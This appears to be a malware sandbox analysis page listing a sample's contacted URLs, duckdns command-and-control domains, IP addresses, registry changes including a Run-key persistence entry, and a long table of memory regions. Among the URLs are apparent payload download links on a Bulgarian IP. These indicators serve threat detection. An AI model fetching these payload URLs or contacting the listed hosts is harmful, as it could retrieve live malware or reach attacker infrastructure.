https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
|
142.250.80.100
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
http://87.121.105.163/Subumbilical.dwp
|
87.121.105.163
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
|
87.121.105.163
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 45 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
192.169.69.26
|
|
|
|
jgbours284hawara02.duckdns.org
|
45.88.90.110
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
www.google.com
|
142.250.80.100
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.88.90.110
|
jgbours284hawara02.duckdns.org
|
Bulgaria
|
|
|
|
192.169.69.26
|
jgbours284hawara01.duckdns.org
|
United States
|
|
|
|
142.250.80.100
|
www.google.com
|
United States
|
||
|
192.168.2.5
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_CURRENT_USER\Underlaying
|
Ambisporangiate
|
||
|
HKEY_CURRENT_USER\Environment
|
Voiceless
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Straddlers
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
59E4000
|
trusted library allocation
|
page read and write
|
|
|
|
8570000
|
direct allocation
|
page execute and read and write
|
|
|
|
7337000
|
heap
|
page read and write
|
|
|
|
8E66000
|
direct allocation
|
page execute and read and write
|
|
|
|
5919000
|
trusted library allocation
|
page read and write
|
|
|
|
4A8E000
|
stack
|
page read and write
|
||
|
466F000
|
heap
|
page read and write
|
||
|
6345000
|
heap
|
page read and write
|
||
|
28E0000
|
heap
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
4B86000
|
heap
|
page read and write
|
||
|
2BD8000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
21BB3D24000
|
trusted library allocation
|
page read and write
|
||
|
6CA0000
|
direct allocation
|
page read and write
|
||
|
6336000
|
heap
|
page read and write
|
||
|
7134000
|
heap
|
page read and write
|
||
|
2BB2000
|
heap
|
page read and write
|
||
|
2D78000
|
heap
|
page read and write
|
||
|
21BAF201000
|
trusted library allocation
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
2B92000
|
heap
|
page read and write
|
||
|
2DCB000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
4653000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
21BAE913000
|
heap
|
page read and write
|
||
|
21BB3EFA000
|
heap
|
page read and write
|
||
|
21BAE890000
|
heap
|
page read and write
|
||
|
6CD0000
|
direct allocation
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D50000
|
heap
|
page readonly
|
||
|
73F5000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
468B000
|
heap
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
7373000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
2C09000
|
trusted library allocation
|
page read and write
|
||
|
4950000
|
trusted library allocation
|
page read and write
|
||
|
4B3C000
|
heap
|
page read and write
|
||
|
2DF8000
|
heap
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
6C70000
|
direct allocation
|
page read and write
|
||
|
7F67000
|
stack
|
page read and write
|
||
|
2C8E000
|
stack
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
57D5000
|
trusted library allocation
|
page read and write
|
||
|
29F8000
|
heap
|
page read and write
|
||
|
22A9E000
|
stack
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
76C000
|
stack
|
page read and write
|
||
|
6C0000
|
direct allocation
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
21BAF102000
|
heap
|
page read and write
|
||
|
82E9000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
21BB3EC8000
|
heap
|
page read and write
|
||
|
850E000
|
stack
|
page read and write
|
||
|
670000
|
direct allocation
|
page read and write
|
||
|
4D6DBFE000
|
stack
|
page read and write
|
||
|
22DA9000
|
heap
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
465E000
|
stack
|
page read and write
|
||
|
2BD8000
|
heap
|
page read and write
|
||
|
86F4000
|
heap
|
page read and write
|
||
|
753E000
|
stack
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
2847000
|
stack
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
2FEF000
|
stack
|
page read and write
|
||
|
86F1000
|
heap
|
page read and write
|
||
|
4F7F000
|
stack
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
31C8000
|
heap
|
page read and write
|
||
|
7389000
|
heap
|
page read and write
|
||
|
2D3A000
|
heap
|
page read and write
|
||
|
23040000
|
heap
|
page read and write
|
||
|
8040000
|
heap
|
page read and write
|
||
|
73BE000
|
heap
|
page read and write
|
||
|
21BB3C50000
|
trusted library allocation
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
735B000
|
heap
|
page read and write
|
||
|
6312000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page read and write
|
||
|
29E6000
|
heap
|
page read and write
|
||
|
22BEC000
|
stack
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
2BE7000
|
heap
|
page read and write
|
||
|
2D68000
|
trusted library allocation
|
page read and write
|
||
|
6342000
|
heap
|
page read and write
|
||
|
2D20000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
21BAF100000
|
heap
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
5E9E000
|
stack
|
page read and write
|
||
|
7363000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
7393000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
21BB3CE0000
|
trusted library allocation
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
8DCC000
|
heap
|
page read and write
|
||
|
21BAF7A0000
|
trusted library allocation
|
page read and write
|
||
|
21BB3E56000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
2314A000
|
heap
|
page read and write
|
||
|
82F5000
|
heap
|
page read and write
|
||
|
21BB3E30000
|
trusted library allocation
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
29B0000
|
trusted library section
|
page read and write
|
||
|
B666000
|
direct allocation
|
page execute and read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
2CE8000
|
trusted library allocation
|
page read and write
|
||
|
734C000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page readonly
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
7375000
|
heap
|
page read and write
|
||
|
8DD3000
|
heap
|
page read and write
|
||
|
6336000
|
heap
|
page read and write
|
||
|
6342000
|
heap
|
page read and write
|
||
|
21BAE82B000
|
heap
|
page read and write
|
||
|
2D10000
|
trusted library allocation
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
2BEB000
|
heap
|
page read and write
|
||
|
2C4F000
|
heap
|
page read and write
|
||
|
227B0000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7377000
|
heap
|
page read and write
|
||
|
2D3F000
|
stack
|
page read and write
|
||
|
4981000
|
trusted library allocation
|
page read and write
|
||
|
8DBD000
|
heap
|
page read and write
|
||
|
21BB3EEE000
|
heap
|
page read and write
|
||
|
4664000
|
heap
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
6F0000
|
direct allocation
|
page read and write
|
||
|
2D13000
|
heap
|
page read and write
|
||
|
2BBE000
|
heap
|
page read and write
|
||
|
21BB3F11000
|
heap
|
page read and write
|
||
|
632D000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
73A9000
|
heap
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
4E50000
|
trusted library allocation
|
page read and write
|
||
|
7363000
|
heap
|
page read and write
|
||
|
4FD1000
|
heap
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
18D000
|
stack
|
page read and write
|
||
|
29E0000
|
trusted library allocation
|
page read and write
|
||
|
633E000
|
heap
|
page read and write
|
||
|
4D6D47E000
|
unkown
|
page readonly
|
||
|
7F600000
|
trusted library allocation
|
page execute and read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
21BAE840000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
2D00000
|
trusted library allocation
|
page read and write
|
||
|
2F2C000
|
heap
|
page read and write
|
||
|
2CF4000
|
trusted library allocation
|
page read and write
|
||
|
4D6DE7E000
|
unkown
|
page readonly
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
464E000
|
heap
|
page read and write
|
||
|
4986000
|
trusted library allocation
|
page read and write
|
||
|
4655000
|
heap
|
page read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
2BEB000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
633C000
|
heap
|
page read and write
|
||
|
29E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
21BB4030000
|
trusted library allocation
|
page read and write
|
||
|
47D8000
|
heap
|
page read and write
|
||
|
634D000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4D6D87E000
|
unkown
|
page readonly
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
4D6C19B000
|
stack
|
page read and write
|
||
|
8CF0000
|
trusted library allocation
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
21BB3F00000
|
heap
|
page read and write
|
||
|
2DEE000
|
heap
|
page read and write
|
||
|
4880000
|
heap
|
page execute and read and write
|
||
|
67F000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
||
|
227A0000
|
direct allocation
|
page read and write
|
||
|
316F000
|
stack
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
2BE3000
|
heap
|
page read and write
|
||
|
8676000
|
heap
|
page read and write
|
||
|
4D5A000
|
trusted library allocation
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
4FE0000
|
heap
|
page read and write
|
||
|
5799000
|
trusted library allocation
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
4653000
|
heap
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
8DDB000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
6328000
|
heap
|
page read and write
|
||
|
7540000
|
heap
|
page read and write
|
||
|
867D000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
23440000
|
unclassified section
|
page execute and read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
870D000
|
heap
|
page read and write
|
||
|
2D88000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
6C80000
|
direct allocation
|
page read and write
|
||
|
2C5E000
|
heap
|
page read and write
|
||
|
2C10000
|
trusted library allocation
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
2D1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
4659000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
64C000
|
stack
|
page read and write
|
||
|
4ADB000
|
trusted library allocation
|
page read and write
|
||
|
2C5B000
|
heap
|
page read and write
|
||
|
854C000
|
stack
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
21BAE902000
|
heap
|
page read and write
|
||
|
306E000
|
stack
|
page read and write
|
||
|
21BB3F0A000
|
heap
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
22B1E000
|
stack
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
4D6CF7E000
|
unkown
|
page readonly
|
||
|
4644000
|
heap
|
page read and write
|
||
|
632F000
|
heap
|
page read and write
|
||
|
2BB2000
|
heap
|
page read and write
|
||
|
632F000
|
heap
|
page read and write
|
||
|
72D8000
|
heap
|
page read and write
|
||
|
75E000
|
stack
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
4760000
|
heap
|
page execute and read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
2BB4000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
2EBC000
|
stack
|
page read and write
|
||
|
6CB0000
|
direct allocation
|
page read and write
|
||
|
21BAF291000
|
trusted library allocation
|
page read and write
|
||
|
47D1000
|
trusted library allocation
|
page read and write
|
||
|
4FD1000
|
heap
|
page read and write
|
||
|
4970000
|
heap
|
page read and write
|
||
|
6342000
|
heap
|
page read and write
|
||
|
62F0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
2C11000
|
heap
|
page read and write
|
||
|
296F000
|
stack
|
page read and write
|
||
|
737B000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
22F32000
|
heap
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page execute and read and write
|
||
|
867B000
|
heap
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
21BAFC50000
|
trusted library allocation
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
6334000
|
heap
|
page read and write
|
||
|
2C8D000
|
stack
|
page read and write
|
||
|
687000
|
stack
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
8DBD000
|
heap
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
2DC3000
|
heap
|
page read and write
|
||
|
21BAE822000
|
heap
|
page read and write
|
||
|
8DD3000
|
heap
|
page read and write
|
||
|
6333000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
90E7000
|
trusted library allocation
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
720000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
86A4000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
28E0000
|
heap
|
page read and write
|
||
|
699000
|
stack
|
page read and write
|
||
|
4D6C87E000
|
unkown
|
page readonly
|
||
|
4B8F000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2BBE000
|
heap
|
page read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
7204000
|
heap
|
page read and write
|
||
|
6336000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
464E000
|
heap
|
page read and write
|
||
|
2BA5000
|
heap
|
page read and write
|
||
|
2D9F000
|
heap
|
page read and write
|
||
|
4EE6000
|
trusted library allocation
|
page read and write
|
||
|
2BC4000
|
heap
|
page read and write
|
||
|
21BAEA00000
|
heap
|
page read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
4655000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
869D000
|
heap
|
page read and write
|
||
|
690000
|
direct allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
21BB3D20000
|
trusted library allocation
|
page read and write
|
||
|
4F0D000
|
trusted library allocation
|
page read and write
|
||
|
466F000
|
heap
|
page read and write
|
||
|
2CCF000
|
stack
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
2ADB000
|
heap
|
page read and write
|
||
|
749D000
|
stack
|
page read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
21BAF113000
|
heap
|
page read and write
|
||
|
4D6D6FE000
|
stack
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
4B84000
|
heap
|
page read and write
|
||
|
4659000
|
heap
|
page read and write
|
||
|
8080000
|
heap
|
page read and write
|
||
|
8550000
|
trusted library allocation
|
page read and write
|
||
|
6364000
|
heap
|
page read and write
|
||
|
2284F000
|
stack
|
page read and write
|
||
|
2BF7000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
21BAF000000
|
heap
|
page read and write
|
||
|
8DCC000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
8080000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
8BC0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4FE0000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page read and write
|
||
|
863F000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
22E40000
|
heap
|
page read and write
|
||
|
3AC0000
|
remote allocation
|
page execute and read and write
|
||
|
54E0000
|
heap
|
page read and write
|
||
|
4ACE000
|
stack
|
page read and write
|
||
|
4639000
|
heap
|
page read and write
|
||
|
2D85000
|
heap
|
page read and write
|
||
|
86F8000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
6336000
|
heap
|
page read and write
|
||
|
8DC1000
|
heap
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
4676000
|
heap
|
page read and write
|
||
|
4D6D8FE000
|
stack
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
4ED4000
|
heap
|
page read and write
|
||
|
320F000
|
stack
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
82D5000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
22A1F000
|
stack
|
page read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
228DF000
|
stack
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
2DB8000
|
heap
|
page read and write
|
||
|
21BAF015000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
86F8000
|
heap
|
page read and write
|
||
|
6F60000
|
heap
|
page read and write
|
||
|
2BC5000
|
heap
|
page read and write
|
||
|
4FB1000
|
heap
|
page read and write
|
||
|
2C22000
|
trusted library allocation
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page read and write
|
||
|
29EC000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
2C46000
|
heap
|
page read and write
|
||
|
745E000
|
stack
|
page read and write
|
||
|
700000
|
direct allocation
|
page read and write
|
||
|
598B000
|
trusted library allocation
|
page read and write
|
||
|
4B9F000
|
remote allocation
|
page execute and read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
86F8000
|
heap
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
21BB4020000
|
trusted library allocation
|
page read and write
|
||
|
2BB2000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
2BBE000
|
heap
|
page read and write
|
||
|
6327000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
4FD4000
|
trusted library allocation
|
page read and write
|
||
|
296E000
|
stack
|
page read and write
|
||
|
803E000
|
stack
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
21BB4040000
|
trusted library allocation
|
page read and write
|
||
|
2BEE000
|
heap
|
page read and write
|
||
|
8651000
|
heap
|
page read and write
|
||
|
8709000
|
heap
|
page read and write
|
||
|
21BB3CE1000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
5660000
|
trusted library allocation
|
page read and write
|
||
|
6340000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
4676000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
852D000
|
stack
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
4D6D3FE000
|
stack
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
831A000
|
heap
|
page read and write
|
||
|
29EB000
|
heap
|
page read and write
|
||
|
21BB3E8C000
|
heap
|
page read and write
|
||
|
4D6CC7B000
|
stack
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
21BAE878000
|
heap
|
page read and write
|
||
|
4D6D5FE000
|
stack
|
page read and write
|
||
|
4F0F000
|
trusted library allocation
|
page read and write
|
||
|
2970000
|
trusted library allocation
|
page read and write
|
||
|
466E000
|
heap
|
page read and write
|
||
|
8F6B000
|
stack
|
page read and write
|
||
|
22E21000
|
heap
|
page read and write
|
||
|
2BF7000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
21BB3ED3000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
21BB4010000
|
trusted library allocation
|
page read and write
|
||
|
529B000
|
stack
|
page read and write
|
||
|
21BB3E44000
|
heap
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
23499000
|
unclassified section
|
page execute and read and write
|
||
|
2BF2000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
C066000
|
direct allocation
|
page execute and read and write
|
||
|
2C11000
|
heap
|
page read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
2D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2DA0000
|
trusted library allocation
|
page read and write
|
||
|
2C11000
|
heap
|
page read and write
|
||
|
741E000
|
stack
|
page read and write
|
||
|
29EB000
|
heap
|
page read and write
|
||
|
21BB3C60000
|
trusted library allocation
|
page read and write
|
||
|
2A7D000
|
stack
|
page read and write
|
||
|
21BB3DB0000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
82B0000
|
heap
|
page read and write
|
||
|
4D6CD7E000
|
unkown
|
page readonly
|
||
|
6D90000
|
direct allocation
|
page read and write
|
||
|
21BB3CE2000
|
trusted library allocation
|
page read and write
|
||
|
4672000
|
heap
|
page read and write
|
||
|
86F1000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
21BAF8A0000
|
trusted library section
|
page readonly
|
||
|
6DA0000
|
direct allocation
|
page read and write
|
||
|
2BF2000
|
heap
|
page read and write
|
||
|
4D6D7FE000
|
stack
|
page read and write
|
||
|
2C4F000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
710000
|
direct allocation
|
page read and write
|
||
|
23119000
|
heap
|
page read and write
|
||
|
2C52000
|
heap
|
page read and write
|
||
|
